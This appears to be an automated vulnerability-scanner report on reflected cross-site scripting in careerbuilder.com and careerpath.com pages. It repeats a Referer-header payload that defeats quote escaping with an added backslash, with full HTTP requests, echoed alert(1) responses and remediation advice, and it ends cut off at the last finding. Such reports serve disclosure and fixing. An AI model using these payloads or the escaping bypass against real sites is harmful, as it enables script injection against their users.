<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... mpany'; s_cb.eVar8='JS_FindJobs - Search By Company - Company Details'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bd7da\\';alert(1)//5262b82cea7'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a1\'%3balert(1)//0af1415a808 was submitted in the Referer HTTP header. This input was echoed as d97a1\\';alert(1)//0af1415a808 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/AdvSearch.htm HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d97a1\'%3balert(1)//0af1415a808
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46913 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=983ad0a969e34e809fd62c7e5b37e231-343071388-wn-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6507975F3BCFF565BE23849239EC03A8D327C834CBF4E31872EA8CF1C1872C8B5B8877E2E8C535F2205; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:36:28 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR24 Date: Sun, 14 Nov 2010 22:36:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find t ...[SNIP]... Advanced Search - AL'; s_cb.eVar8='JS_FindJobs - Advanced Search - AL'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - d97a1\\';alert(1)//0af1415a808'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 504d9\'%3balert(1)//47263a58400 was submitted in the Referer HTTP header. This input was echoed as 504d9\\';alert(1)//47263a58400 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/JSToolkit.htm HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=504d9\'%3balert(1)//47263a58400
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34252 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=d9349376736248e99f3e206fc011126a-343071339-XE-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650E17D2A66E2572248AC6564350CC7CC3D5C8EF322D24CA032ABA5DB1252052B544CE6AF6628246E89; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:38 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR45 Date: Sun, 14 Nov 2010 22:35:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... s'; s_cb.prop1='Toolkit'; s_cb.eVar8='JS_Resources - Toolkit'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 504d9\\';alert(1)//47263a58400'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6904b\'%3balert(1)//225b75150e was submitted in the Referer HTTP header. This input was echoed as 6904b\\';alert(1)//225b75150e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/ResDistribution.htm HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6904b\'%3balert(1)//225b75150e
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28208 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=29d6ea0d88d54b33955bcf4f8c9d8068-343071442-wf-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65074362015E37C52EB6DCB6E497CCDB7D440A5E0D4287DB981DA07F44489690A6D3936B5B81C7507DD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:37:22 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR16 Date: Sun, 14 Nov 2010 22:37:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Resume ...[SNIP]... uncher - Start'; s_cb.eVar8='JS_PostResumes - Resume Launcher - Start'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6904b\\';alert(1)//225b75150e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62d8b\'%3balert(1)//21eb2b8b09c was submitted in the Referer HTTP header. This input was echoed as 62d8b\\';alert(1)//21eb2b8b09c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/ResUpgrades.htm HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=62d8b\'%3balert(1)//21eb2b8b09c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32019 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=4659eedfeb0e43a4ac7f2eaaa16d6cba-343071487-wx-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650F95C4771AFC50068C8BDE313A6F80DF93030C645A0F6152663E4F8891CBF90BCD61656B8AB6A21AF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:38:07 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR34 Date: Sun, 14 Nov 2010 22:38:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Resume ...[SNIP]... ageWoman_U'; s_cb.eVar8='JS_PostResumes - ResumeUpgradeV2_SageWoman_U'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 62d8b\\';alert(1)//21eb2b8b09c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed05\'%3balert(1)//006510e2ce1 was submitted in the Referer HTTP header. This input was echoed as 8ed05\\';alert(1)//006510e2ce1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/StellarResume.htm HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8ed05\'%3balert(1)//006510e2ce1
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35302 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=1f49a9df1f41483d893475d4b6028bc6-343071432-XB-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650C2685EFEE1490492CFECC56590517CF4F40480D86473CB764C423719E60DE23B370F1C6FAC352909; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:37:12 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR42 Date: Sun, 14 Nov 2010 22:37:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Resume ...[SNIP]... Resume - Start'; s_cb.eVar8='JS_PostResumes - Stellar Resume - Start'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 8ed05\\';alert(1)//006510e2ce1'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44200\'%3balert(1)//3eb03fa9edc was submitted in the Referer HTTP header. This input was echoed as 44200\\';alert(1)//3eb03fa9edc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/companies/companysearch.aspx HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=44200\'%3balert(1)//3eb03fa9edc
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 254379 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=0ba81b5ae8db447bbabf0968b4be524f-343071320-x3-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650042EB88A707D024234D9E8BC85C0DFF5F085CBA33870C498076CFE32466C9B4F7269ED7A39C0DED8; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:19 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR39 Date: Sun, 14 Nov 2010 22:35:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='Search By Company'; s_cb.eVar8='JS_FindJobs - Search By Company'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 44200\\';alert(1)//3eb03fa9edc'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fed12\'%3balert(1)//1f1d47f8f6c was submitted in the Referer HTTP header. This input was echoed as fed12\\';alert(1)//1f1d47f8f6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/companies/companysearch.aspx?lr=cbcb_elnh&siteid=cbcb_elnh001 HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fed12\'%3balert(1)//1f1d47f8f6c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 254379 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=dd1a91d709d94aeabab216af2ec79f8f-343071633-wo-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650339CAF6C416FF52CCF9A291B968AE05F8BAFF5A714B3B4231336F52A60EE01EFDEC88E9913649017; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:40:33 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 14 Nov 2010 22:40:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='Search By Company'; s_cb.eVar8='JS_FindJobs - Search By Company'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - fed12\\';alert(1)//1f1d47f8f6c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 206c2\'%3balert(1)//90ed6d566dc was submitted in the Referer HTTP header. This input was echoed as 206c2\\';alert(1)//90ed6d566dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/jobs/jobfindadv.aspx?lr=cbcb_elnh&siteid=cbcb_elnh001 HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=206c2\'%3balert(1)//90ed6d566dc
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46908 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=2cda30bb9b864ab6868e76ba05c31f3e-343071428-wy-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650C16798196E5F0343BDBA35660FED5BD6DD338CE1DFE1E6ED4F646F8909A1E3F2541114341BEA8823; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:37:08 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR35 Date: Sun, 14 Nov 2010 22:37:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find t ...[SNIP]... Advanced Search - AL'; s_cb.eVar8='JS_FindJobs - Advanced Search - AL'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 206c2\\';alert(1)//90ed6d566dc'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 696a8\'%3balert(1)//e199ede896c was submitted in the Referer HTTP header. This input was echoed as 696a8\\';alert(1)//e199ede896c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=696a8\'%3balert(1)//e199ede896c
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46908 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=f3e8a81d541549ab9c8cc7c32ed9457f-343071260-XD-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65027D9A8546340C7DCF4E4ADD1377723C5AFFB1CB27CAF57D51AAFF27649C7EE0F4AB6007A06BD1C24; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:20 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 22:34:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find t ...[SNIP]... Advanced Search - AL'; s_cb.eVar8='JS_FindJobs - Advanced Search - AL'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 696a8\\';alert(1)//e199ede896c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97b5f\'%3balert(1)//1e14e191674 was submitted in the Referer HTTP header. This input was echoed as 97b5f\\';alert(1)//1e14e191674 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerpath.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=97b5f\'%3balert(1)//1e14e191674
Response
